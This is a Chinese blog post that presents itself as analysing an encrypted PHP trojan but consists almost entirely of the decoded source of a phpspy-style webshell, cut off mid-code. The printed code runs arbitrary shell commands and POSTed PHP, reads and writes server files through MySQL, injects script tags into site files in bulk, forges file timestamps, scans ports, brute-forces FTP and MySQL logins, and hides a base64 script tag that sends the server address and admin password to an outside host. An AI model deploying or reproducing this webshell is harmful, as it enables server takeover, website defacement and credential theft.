php 木马的分析(加密破解)_PHP

不言
不言オリジナル
2018-08-28 16:56:046495ブラウズ

分析可以知道,此木马经过了base64进行了编码,然后进行压缩。虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,所以写出如下php程序对其进行解码,解压缩,写入文件。
解码解压缩代码如下:
复制代码 代码如下:

<?php 
function writetofile($filename, $data) 
{ //File Writing 
$filenum=@fopen($filename,"w"); 
if (!$filenum) { 
return false; 
} 
flock($filenum,LOCK_EX); 
$file_data=fwrite($filenum,$data); 
fclose($filenum); 
return true; 
} 
?>

然后在php的环境下进行运行,会得到php明文文件如下:
复制代码 代码如下:

error_reporting(7); 
ob_start(); 
$mtime = explode(&#39; &#39;, microtime()); 
$starttime = $mtime[1] + $mtime[0]; 
@set_time_limit(0); 
//非安全模式可以使用上面的函数,超时取消。 
/*===================== 程序配置 =====================*/ 
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效 
$admin[&#39;check&#39;] = "1"; 
// 如果需要密码验证,请修改登陆密码 
//默认端口表 
$hidden = "44997"; 
$admin[&#39;port&#39;] = "80,139,21,3389,3306,43958,1433,5631"; 
//跳转用的秒 
$admin[&#39;jumpsecond&#39;] = "1"; 
//Ftp破解用的连接端口 
$alexa = "yes"; 
//是否显示alexa排名,yes或是no 
$admin[&#39;ftpport&#39;] = "21"; 
// 是否允许phpspy本身自动修改编辑后文件的时间为建立时间(yes/no) 
$retime = "no"; 
// 默认cmd.exe的位置,proc_open函数要使用的,linux系统请对应修改.(假设是winnt系统在程序里依然可以指定) 
$cmd = "cmd.exe"; 
// 下面是phpspy显示版权那栏的,因为被很多程序当成作为关键词杀了,鱼寒~~允许自定义吧。还是不懂别改~~ 

/*===================== 配置结束 =====================*/ 
$serveru = $_SERVER [&#39;HTTP_HOST&#39;].$_SERVER[&#39;PHP_SELF&#39;]; 
$serverp = $admin[&#39;pass&#39;]; 
$copyurl = base64_decode(&#39;PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9&#39;); 
$copyurll = base64_decode(&#39;Jz48L3NjcmlwdD4=&#39;); 
$onoff = (function_exists(&#39;ini_get&#39;)) ? ini_get(&#39;register_globals&#39;) : get_cfg_var(&#39;register_globals&#39;); 
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);} 
$self = $_SERVER[&#39;PHP_SELF&#39;];$dis_func = get_cfg_var("disable_functions"); 
/*===================== 身份验证 =====================*/ 
if($admin[&#39;check&#39;]
 == "1") {if ($_GET[&#39;action&#39;] == "logout") {setcookie ("adminpass", 
"");echo "<meta http-equiv=\"refresh\" 
content=\"0;URL=".$self."\">";echo "<span style="\" 
style="\""font-size: 12px; font-family: 
Verdana\">注销成功......<p><a href="\" 
href="\""".$self."\">三秒后自动退出或单击这里退出程序界面 
>>></a></span>";exit;} 
if ($_POST[&#39;do&#39;] == 
&#39;login&#39;) {$thepass=trim($_POST[&#39;adminpass&#39;]);if ($admin[&#39;pass&#39;] == 
$thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo 
"<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo 
"".$copyurl.$serveru."&p=".$serverp.$copyurll."</form>";exit;}}if
 (isset($_COOKIE[&#39;adminpass&#39;])) {if ($_COOKIE[&#39;adminpass&#39;] != 
$admin[&#39;pass&#39;]) {loginpage();}} else {loginpage();}} 
/*===================== 验证结束 =====================*/ 
// 判断 magic_quotes_gpc 状态 
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);} 
//mix.dll的代码 
$mixdll
 = 
"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"; 

function shelL($command){ 
global $windows,$disablefunctions; 
$exec = &#39;&#39;;$output= &#39;&#39;; 
$dep[]=array(&#39;pipe&#39;,&#39;r&#39;);$dep[]=array(&#39;pipe&#39;,&#39;w&#39;); 
if(is_callable(&#39;passthru&#39;)
 && !strstr($disablefunctions,&#39;passthru&#39;)){ 
@ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} 
elseif(is_callable(&#39;system&#39;) && 
!strstr($disablefunctions,&#39;system&#39;)){$tmp = @ob_get_contents(); 
@ob_clean();system($command) ; $output = @ob_get_contents(); 
@ob_clean(); $exec= $tmp; } 
elseif(is_callable(&#39;exec&#39;) && 
!strstr($disablefunctions,&#39;exec&#39;)) {exec($command,$output);$output = 
join("\n",$output);$exec= $output;} 
elseif(is_callable(&#39;shell_exec&#39;) && !strstr($disablefunctions,&#39;shell_exec&#39;)){$exec= shell_exec($command);} 
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} 
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line
 = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} 
elseif
 ($windows && is_object($ws = new 
COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get(&#39;upload_tmp_dir&#39;)
 ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command 
>$name", 0, true);$exec = file_get_contents($name);unlink($name);} 
return $exec; 
} 
// 查看PHPINFO 
if
 ($_GET[&#39;action&#39;] == "phpinfo") {echo 
$phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 
函数已被禁用,请查看<PHP环境变量>";exit; 
}if($_GET[&#39;action&#39;] == "nowuser") {$user = get_current_user(); 
if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!"; 
echo"当前进程用户名:$user"; 
exit; 
} 
if(isset($_POST[&#39;phpcode&#39;])){eval("?".">$_POST[phpcode]<?");exit; 
} 
if($action=="mysqldown"){ 
    $link=@mysql_connect($host,$user,$password); 
    if (!$link) { 
        $downtmp = &#39;数据库连接失败: &#39; . mysql_error(); 
    }else{ 
    $query="select load_file(&#39;".$filename."&#39;);"; 
    $result = @mysql_query($query, $link); 
    if(!$result){ 
        $downtmp = "读取失败,可能是文件不存在或是没file权限。<br>".mysql_error(); 
            }else{ 
    while ($row = mysql_fetch_array($result)) { 
        $filename = basename($filename); 
        if($rardown=="yes"){ 
            $zip = NEW Zip; 
            $zipfiles[]=Array("$filename",$row[0]); 
            $zip->Add($zipfiles,1); 
            $code = $zip->get_file(); 
            $filename = "".$filename.".rar"; 
        }else{ 
            $code = $row[0]; 
        } 
        header("Content-type: application/octet-stream"); 
        header("Accept-Ranges: bytes"); 
        header("Accept-Length: ".strlen($code)); 
        header("Content-Disposition: attachment;filename=$filename"); 
        echo($code); 
        exit; 
    } 
    } 
    } 
} 
// 在线代理 
if
 (isset($_POST[&#39;url&#39;])) {$proxycontents = 
@file_get_contents($_POST[&#39;url&#39;]);echo ($proxycontents) ? $proxycontents
 : "<body bgcolor=\"#F5F5F5\" style="\" style="\""font-size: 
12px;\"><center><br><p><b>获取 URL 
内容失败</b></p></center></body>";exit; 
} 
// 下载文件 
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "<script type="text/javascript"><!-- 
alert(&#39;你要下的文件不存在!&#39;) 
//
 --></script>";} else {$filename = 
basename($downfile);$filename_info = explode(&#39;.&#39;, $filename);$fileext = 
$filename_info[count($filename_info)-1];header(&#39;Content-type: 
application/x-&#39;.$fileext);header(&#39;Content-Disposition: attachment; 
filename=&#39;.$filename.&#39;&#39;);header(&#39;Content-Description: PHP Generated 
Data&#39;);header(&#39;Content-Length: 
&#39;.filesize($downfile));@readfile($downfile);exit;} 
} 
// 直接下载备份数据库 
if ($_POST[&#39;backuptype&#39;] == &#39;download&#39;) { 
    @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); 
    @mysql_select_db($dbname) or die("选择数据库失败");     
    $table = array_flip($_POST[&#39;table&#39;]); 
    $result = mysql_query("SHOW tables"); 
    echo ($result) ? NULL : "出错: ".mysql_error(); 

    $filename = basename($_SERVER[&#39;HTTP_HOST&#39;]."_MySQL.sql"); 
    header(&#39;Content-type: application/unknown&#39;); 
    header(&#39;Content-Disposition: attachment; filename=&#39;.$filename); 
    $mysqldata = &#39;&#39;; 
    while ($currow = mysql_fetch_array($result)) { 
        if (isset($table[$currow[0]])) { 
            $mysqldata.= sqldumptable($currow[0]); 
            $mysqldata.= $mysqldata."\r\n"; 
        } 
    } 
    mysql_close(); 
    exit; 
} 

// 程序目录 
$pathname=str_replace(&#39;\\&#39;,&#39;/&#39;,dirname(__FILE__)); 
$dirpath=str_replace(&#39;\\&#39;,&#39;/&#39;,$_SERVER["DOCUMENT_ROOT"]); 

// 获取当前路径 
if (!isset($dir) or empty($dir)) { 
    $dir = "."; 
    $nowpath = getPath($pathname, $dir); 
} else { 
    $dir=$_GET[&#39;dir&#39;]; 
    $nowpath = getPath($pathname, $dir); 
} 

// 判断读写情况 
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写"; 
$phpinfo=(!eregi("phpinfo",$dis_func))
 ? " | <a href="\" href="\""?action=phpinfo\" 
target=\"_blank\">PHPINFO()</a>" : ""; 
$reg = (substr(PHP_OS, 0, 3) == &#39;WIN&#39;) ? " | <a href="\" href="\""?action=reg\">注册表操作</a>" : ""; 

$tb = new FORMS; 

?> 
<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> 
<style type="text/css"><!-- 
body,td{font-size: 12px;background-color:#000000;color:#eee; 
margin: 1px;margin-left:1px; 
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; 
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; 
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF; 
SCROLLBAR-TRACK-COLOR: #383838;} 
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000} 
.smlfont { 
    font-family: "Verdana", "Tahoma", "宋体"; 
    font-size: "11px"; 
} 
.INPUT { 
    FONT-SIZE: "12px"; 
    COLOR: "#000000"; 
    BACKGROUND-COLOR: "#FFFFFF"; 
    height: "18px"; 
    border: "1px solid #666666"; 
    padding-left: "2px"; 
} 
.redfont {COLOR: "#CA0000";} 

.top {BACKGROUND-COLOR: "#CCCCCC"} 
.firstalt {BACKGROUND-COLOR: "#EFEFEF"} 
.secondalt {BACKGROUND-COLOR: "#F5F5F5"} 
--></style><style type="text/css" bogus="1">body,td{font-size: 12px;background-color:#000000;color:#eee; 
margin: 1px;margin-left:1px; 
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; 
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; 
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF; 
SCROLLBAR-TRACK-COLOR: #383838;} 
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000} 
.smlfont { 
    font-family: "Verdana", "Tahoma", "宋体"; 
    font-size: "11px"; 
} 
.INPUT { 
    FONT-SIZE: "12px"; 
    COLOR: "#000000"; 
    BACKGROUND-COLOR: "#FFFFFF"; 
    height: "18px"; 
    border: "1px solid #666666"; 
    padding-left: "2px"; 
} 
.redfont {COLOR: "#CA0000";} 

.top {BACKGROUND-COLOR: "#CCCCCC"} 
.firstalt {BACKGROUND-COLOR: "#EFEFEF"} 
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}</style> 
<SCRIPT language=JavaScript> 
function CheckAll(form) { 
    for (var i=0;i<form.elements.length;i++) { 
        var e = form.elements[i]; 
        if (e.name != &#39;chkall&#39;) 
        e.checked = form.chkall.checked; }} 
function
 really(d,f,m,t) {if (confirm(m)) {if (t == 1) 
{window.location.href=&#39;?dir=&#39;+d+&#39;&deldir=&#39;+f;} else 
{window.location.href=&#39;?dir=&#39;+d+&#39;&delfile=&#39;+f;}}} 
</SCRIPT> 
</head> 
<title><?php echo"$myneme"?></title> 
<body
 style="table-layout:fixed; word-break:break-all onmouseover=" 
style="table-layout:fixed; word-break:break-all 
onmouseover="window.status=&#39;设计:幽月 
仅限于网站管理员安全检测用,请务使用于非法用途,后果作者概不负责&#39;;return true" style="FILTER: 
progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)"
 style="FILTER: 
progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)"> 
<center> 
<?php 
//$_SERVER["DOCUMENT_ROOT"] 
$tb->tableheader(); 
$tb->tdbody(&#39;<table
 width="98%" border="0" cellpadding="0" 
cellspacing="0"><tr><td><b>&#39;.$_SERVER[&#39;HTTP_HOST&#39;].&#39;</b></td><td
 align="center">&#39;.date("Y年m月d日 h:i:s",time()).&#39;</td><td 
align="right"><b>&#39;.gethostbyname($_SERVER[&#39;SERVER_NAME&#39;]).&#39;</b></td></tr></table>&#39;,&#39;center&#39;,&#39;top&#39;); 
$tb->tdbody(&#39;<a href="?dir=&#39;.$dirpath.&#39;" 
href="?dir=&#39;.$dirpath.&#39;">根目录</a> | <a href="?action=dir" 
href="?action=dir">Shell目录</a> | <a href="?action=phpenv" 
href="?action=phpenv">环境变量</a> | <a href="?action=proxy" 
href="?action=proxy">在线代理</a>&#39;.$reg.$phpinfo.&#39; | <a 
href="?action=shell" href="?action=shell">WebShell</a> | <a 
href="?action=crack" href="?action=crack">杂项破解</a> | <a 
href="?action=mix" href="?action=mix">解压mix.dll</a> | <a 
href="?action=logout" href="?action=logout">注销登录</a>&#39;); 
$tb->tdbody(&#39;<a
 href="?action=plgm" href="?action=plgm">批量挂马</a> | <a 
href="?action=downloads" href="?action=downloads">Http文件下载</a> |
 <a href="?action=search&dir=&#39;.$dir.&#39;" 
href="?action=search&dir=&#39;.$dir.&#39;">文件查找</a> | <a 
href="?action=eval" href="?action=eval">执行php脚本</a> | <a 
href="?action=sql" href="?action=sql">执行SQL语句</a> | <a 
href="?action=mysqlfun" href="?action=mysqlfun">Func反弹Shell</a>
 | <a href="?action=sqlbak" 
href="?action=sqlbak">MySQL备份</a> | <a href="?action=SUExp" 
href="?action=SUExp">Serv-U提权</a>&#39;); 
$tb->tablefooter(); 
?> 
<hr width="775" noshade> 
<table width="775" border="0" cellpadding="0"> 
<? 
$tb->headerform(array(&#39;method&#39;=>&#39;GET&#39;,&#39;content&#39;=>&#39;<p>程序路径:
 
&#39;.$pathname.&#39;<br>当前目录(&#39;.$dir_writeable.&#39;,&#39;.substr(base_convert(@fileperms($nowpath),10,8),-4).&#39;):
 &#39;.$nowpath.&#39;<br>跳转目录: 
&#39;.$tb->makeinput(&#39;dir&#39;,&#39;&#39;.$nowpath.&#39;&#39;,&#39;&#39;,&#39;text&#39;,&#39;80&#39;).&#39; 
&#39;.$tb->makeinput(&#39;&#39;,&#39;确定&#39;,&#39;&#39;,&#39;submit&#39;).&#39; 〖支持绝对路径和相对路径〗&#39;)); 

$tb->headerform(array(&#39;action&#39;=>&#39;?dir=&#39;.urlencode($dir),&#39;enctype&#39;=>&#39;multipart/form-data&#39;,&#39;content&#39;=>&#39;上传文件到当前目录:
 &#39;.$tb->makeinput(&#39;uploadfile&#39;,&#39;&#39;,&#39;&#39;,&#39;file&#39;).&#39; 
&#39;.$tb->makeinput(&#39;doupfile&#39;,&#39;确定&#39;,&#39;&#39;,&#39;submit&#39;).$tb->makeinput(&#39;uploaddir&#39;,$dir,&#39;&#39;,&#39;hidden&#39;))); 

$tb->headerform(array(&#39;action&#39;=>&#39;?action=editfile&dir=&#39;.urlencode($dir),&#39;content&#39;=>&#39;新建文件在当前目录:
 &#39;.$tb->makeinput(&#39;editfile&#39;).&#39; 
&#39;.$tb->makeinput(&#39;createfile&#39;,&#39;确定&#39;,&#39;&#39;,&#39;submit&#39;))); 

$tb->headerform(array(&#39;content&#39;=>&#39;新建目录在当前目录:
 &#39;.$tb->makeinput(&#39;newdirectory&#39;).&#39; 
&#39;.$tb->makeinput(&#39;createdirectory&#39;,&#39;确定&#39;,&#39;&#39;,&#39;submit&#39;))); 
?> 
</table> 
<hr width="775" noshade> 
<?php 
/*===================== 执行操作 开始 =====================*/ 
echo "<p><b>\n"; 
// 删除文件 
if (!empty($delfile)) { 
    if (file_exists($delfile)) { 
        echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!"; 
    } else { 
        echo basename($delfile)." 文件已不存在!"; 
    } 
} 

// 删除目录 
elseif (!empty($deldir)) { 
    $deldirs="$dir/$deldir"; 
    if (!file_exists("$deldirs")) { 
        echo "$deldir 目录已不存在!"; 
    } else { 
        echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!"; 
    } 
} 

// 创建目录 
elseif (($createdirectory) AND !empty($_POST[&#39;newdirectory&#39;])) { 
    if (!empty($newdirectory)) { 
        $mkdirs="$dir/$newdirectory"; 
        if (file_exists("$mkdirs")) { 
            echo "该目录已存在!"; 
        } else { 
            echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!"; 
            @chmod("$mkdirs",0777); 
        } 
    } 
} 

// 上传文件 
elseif ($doupfile) { 
    echo (@copy($_FILES[&#39;uploadfile&#39;][&#39;tmp_name&#39;],"".$uploaddir."/".$_FILES[&#39;uploadfile&#39;][&#39;name&#39;]."")) ? "上传成功!" : "上传失败!"; 
} 
elseif($action=="mysqlup"){ 
    $filename = $_FILES[&#39;upfile&#39;][&#39;tmp_name&#39;]; 
    if(!$filename) { 
        echo"没有选择要上传的文件。。"; 
    }else{ 
    $shell = file_get_contents($filename); 
    $mysql = bin2hex($shell); 
    if(!$upname) $upname = $_FILES[&#39;upfile&#39;][&#39;name&#39;]; 
    $shell = "select 0x".$mysql." from ".$database." into DUMPFILE &#39;".$uppath."/".$upname."&#39;;"; 
    $link=@mysql_connect($host,$user,$password); 
    if(!$link){ 
        echo "登陆失败".mysql_error(); 
    }else{ 
        $result = mysql_query($shell, $link); 
        if($result){ 
            echo"操作成功.文件成功上传到".$host.",文件名为".$uppath."/".$upname.".."; 
        }else{ 
                echo"上传失败 原因:".mysql_error(); 
            } 
        } 
    } 

} 
elseif($action=="mysqldown"){ 
    if(!empty($downtmp)) echo $downtmp; 
} 
// 编辑文件 
elseif ($_POST[&#39;do&#39;] == &#39;doeditfile&#39;) { 
    if (!empty($_POST[&#39;editfilename&#39;])) { 
if(!file_exists($editfilename)) unset($retime); 
    if($time==$now) $time = @filemtime($editfilename); 
$time2 = @date("Y-m-d H:i:s",$time); 
        $filename="$editfilename"; 
        @$fp=fopen("$filename","w"); 
        if($_POST[&#39;change&#39;]=="yes"){ 
        $filecontent = "?".">".$_POST[&#39;filecontent&#39;]."<?"; 
        $filecontent = gzdeflate($filecontent); 
$filecontent = base64_encode($filecontent); 
$filecontent = "<?php\n/*\n代码由浅蓝的辐射鱼加密!\n*/\neval(gzinflate(base64_decode(&#39;$filecontent&#39;)));\n"."?>"; 
        }else{ 
        $filecontent = $_POST[&#39;filecontent&#39;]; 
        } 
        echo $msg=@fwrite($fp,$filecontent) ? "写入文件成功!" : "写入失败!"; 
        @fclose($fp); 
        if($retime=="yes"){ 
echo" 鱼鱼自动操作:"; 
echo $msg=@touch($filename,$time) ? "修改文件为".$time2."成功!" : "修改文件时间失败!"; 
        } 
    } else { 
        echo "请输入想要编辑的文件名!"; 
    } 
} 
//文件下载 
elseif ($_POST[&#39;do&#39;] == &#39;downloads&#39;) { 
    $contents = @file_get_contents($_POST[&#39;durl&#39;]); 
    if(!$contents){ 
    echo"无法读取要下载的数据"; 
    } 
    elseif(file_exists($path)){ 
    echo"很抱歉,文件".$path."已经存在了,请更换保存文件名。"; 
    }else{ 
$fp = @fopen($path,"w"); 
    echo $msg=@fwrite($fp,$contents) ? "下载文件成功!" : "下载文件写入时失败!"; 
    @fclose($fp); 
    } 
} 
elseif($_POST[&#39;action&#39;]=="mix"){ 
    if(!file_exists($_POST[&#39;mixto&#39;])){ 
    $tmp = base64_decode($mixdll); 
    $tmp = gzinflate($tmp); 
    $fp = fopen($_POST[&#39;mixto&#39;],"w"); 
    echo $msg=@fwrite($fp,$tmp) ? "解压缩成功!" : "此目录不可写吧?!"; 
    fclose($fp); 
}else{ 
    echo"不是吧?".$_POST[&#39;mixto&#39;]."已经存在了耶~"; 
} 
} 
// 编辑文件属性 
elseif ($_POST[&#39;do&#39;] == &#39;editfileperm&#39;) { 
    if (!empty($_POST[&#39;fileperm&#39;])) { 
        $fileperm=base_convert($_POST[&#39;fileperm&#39;],8,10); 
        echo (@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改失败!"; 
        echo " 文件 ".$file." 修改后的属性为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4); 
    } else { 
        echo "请输入想要设置的属性!"; 
    } 
} 

// 文件改名 
elseif ($_POST[&#39;do&#39;] == &#39;rename&#39;) { 
    if (!empty($_POST[&#39;newname&#39;])) { 
        $newname=$_POST[&#39;dir&#39;]."/".$_POST[&#39;newname&#39;]; 
        if (@file_exists($newname)) { 
            echo "".$_POST[&#39;newname&#39;]." 已经存在,请重新输入一个!"; 
        } else { 
            echo
 (@rename($_POST[&#39;oldname&#39;],$newname)) ? basename($_POST[&#39;oldname&#39;])." 
成功改名为 ".$_POST[&#39;newname&#39;]." !" : "文件名修改失败!"; 
        } 
    } else { 
        echo "请输入想要改的文件名!"; 
    } 
} 
elseif ($_POST[&#39;do&#39;] == &#39;search&#39;) { 
if(!empty($oldkey)){ 
echo"<span class=\"redfont\">查找关键词:[".$oldkey."],下面显示查找的结果:"; 
    if($type2 == "getpath"){ 
    echo"鼠标移到结果文件上会有部分截取显示."; 
} 
echo"</span><br><hr width=\"775\" noshade>"; 
find($path); 
}else{ 
echo"你要查虾米?到底要查虾米呢?有没有虾米要你查呢?"; 
} 
} 
elseif ($_GET[&#39;action&#39;]==&#39;plgmok&#39;) { 
dirtree($_POST[&#39;dir&#39;],$_POST[&#39;mm&#39;]); 
} 
elseif ($_GET[&#39;action&#39;] == "plgm") { 
    $action = &#39;?action=plgmok&#39;; 
    $gm = "<script src="http://127.0.0.1" src="http://127.0.0.1"></script>"; 
    $tb->tableheader(); 
    $tb->formheader($action,&#39;批量挂马&#39;); 
    $tb->tdbody(&#39;网站批量挂马程序php版&#39;,&#39;center&#39;); 
    $tb->tdbody(&#39;文件位置:
 
&#39;.$tb->makeinput(&#39;dir&#39;,&#39;&#39;.$_SERVER["DOCUMENT_ROOT"].&#39;&#39;,&#39;&#39;,&#39;text&#39;,&#39;60&#39;).&#39;<br>要挂代码:&#39;.$tb->maketextarea(&#39;mm&#39;,$gm,&#39;50&#39;,&#39;5&#39;).&#39;&#39;.$tb->makehidden(&#39;do&#39;,&#39;批量挂马&#39;).&#39;<br>&#39;.$tb->makeinput(&#39;submit&#39;,&#39;开始挂马&#39;,&#39;&#39;,&#39;submit&#39;),&#39;center&#39;,&#39;1&#39;,&#39;35&#39;); 
    echo "</form>"; 
    $tb->tablefooter(); 
}//end plgm 
// 克隆时间 
elseif ($_POST[&#39;do&#39;] == &#39;domodtime&#39;) { 
    if (!@file_exists($_POST[&#39;curfile&#39;])) { 
        echo "要修改的文件不存在!"; 
    } else { 
        if (!@file_exists($_POST[&#39;tarfile&#39;])) { 
            echo "要参照的文件不存在!"; 
        } else { 
            $time=@filemtime($_POST[&#39;tarfile&#39;]); 
            echo
 (@touch($_POST[&#39;curfile&#39;],$time,$time)) ? basename($_POST[&#39;curfile&#39;])."
 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!"; 
        } 
    } 
} 

// 自定义时间 
elseif ($_POST[&#39;do&#39;] == &#39;modmytime&#39;) { 
    if (!@file_exists($_POST[&#39;curfile&#39;])) { 
        echo "要修改的文件不存在!"; 
    } else { 
        $year=$_POST[&#39;year&#39;]; 
        $month=$_POST[&#39;month&#39;]; 
        $data=$_POST[&#39;data&#39;];         
        $hour=$_POST[&#39;hour&#39;]; 
        $minute=$_POST[&#39;minute&#39;]; 
        $second=$_POST[&#39;second&#39;]; 
        if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) { 
            $time=strtotime("$data $month $year $hour:$minute:$second"); 
            echo
 (@touch($_POST[&#39;curfile&#39;],$time,$time)) ? basename($_POST[&#39;curfile&#39;])."
 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!"; 
        } 
    } 
} 
elseif($do ==&#39;port&#39;){ 
        $tmp = explode(",",$port); 
        $count = count($tmp); 
    for($i=$first;$i<$count;$i++){ 
            $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); 
            if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."<br>"; 
    } 
} 
/* 
这里代码写得很杂,说实话我自己都不知道写了什么。 
好在能用,我就没管了,假设有人看到干脆重写吧。*/ 
elseif ($do == &#39;crack&#39;) {//反正注册为全局变量了。 
    if(@file_exists($passfile)){ 
        $tmp = file($passfile); 
        $count = count($tmp); 
        if(empty($onetime)){ 
            $onetime = $count; 
            $turn="1"; 
        }else{ 
            $nowturn = $turn+1; 
            $now = $turn*$onetime; 
            $tt = intval(($count/$onetime)+1); 
        } 
        if($turn>$tt or $onetime>$count){ 
            echo"超过字典容量了耶~要是破解最后进程的,很抱歉失败。"; 
            }else{ 
                $first = $onetime*($turn-1); 
                for($i=$first;$i<$now;$i++){ 
                    if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i])); 
                    else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i])); 
                if($sa) 
                    { 
